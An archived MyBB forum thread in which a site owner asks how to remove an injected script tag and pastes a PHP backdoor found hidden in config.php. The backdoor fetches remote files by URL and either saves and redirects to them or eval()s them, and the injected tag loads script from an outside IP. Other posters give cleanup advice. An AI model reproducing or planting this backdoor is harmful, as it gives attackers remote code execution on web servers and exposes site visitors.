MyBB Community Forums

MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > How to remove this js virus
Full Version: How to remove this js virus
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

vikram

2012-01-16, 06:16 PM
my index file Show A Script
<script id="dgllhguk" src="http://91.196.216.64/s.php?ref=&lc=http://dreamdth.com/Forum/index.php&ua=Mozilla/5.0%20%28Windows%20NT%205.1%3B%20rv%3A5.0%29%20Gecko/20100101%20Firefox/5.0">

i think it is a virus and all antivirus show this multiple or blocked content
it is found on index.php Befor </head> Tag, How can i found this in mybb folder ? what is the location of this script id ? please help me how can delete this script from mybb 1.6.5

Josh H.

2012-01-16, 06:19 PM
Firstly, get rid of that snippet. Second, run File Verification in the ACP. Any files which you have not knowingly changed should be replaced.

Also, make sure there is no malicious code in inc/config.php . Watch carefully, because on occasion malicious code is placed after 2000 blank lines.

If you are paranoid enough, download a mybb package, and check to see if there are any extra files in your installation @ your site.

ranjani

2012-01-16, 06:20 PM
:oops: <removed>

Paul H.

2012-01-16, 06:21 PM
Forum URL??

Josh H.

2012-01-16, 06:26 PM
You might also want to check your .htaccess file to see if any redirects were added.

vikram

2012-01-17, 10:50 AM
Thanks GamerVoid For Try to solving My issue
i check my config.php and Get

"if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '50905d7b2216bfeccb5b41016357176b'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}"

on Line number 113, i delete it and Upload Fresh copy of config file thats 100 lines and 2819kb and old file is 6896 kb,
i download mybb 1.6.5 and View Config.php But it show Blank in Notpad++,

Anyone know Config file have above script on 2113 line ?

ranjani

2012-01-17, 11:04 AM
^ No, that is malicious code ..

Josh H.

2012-01-17, 03:37 PM
You can leave the actual English-like code above the malicious code and almost 2000 white lines. The (what I like to call) cURLy code needs to go though.

config.php is blank in the package because of it being different for everyone. It is written to during install, but see http://wiki.mybb.com/index.php/Inc/config.php to see what a safe config.php file looks like.
MyBB Community Forums > Community Archive > Archived Forums > Archived Development and Support > MyBB 1.6 > 1.6 Security Management and Support > How to remove this js virus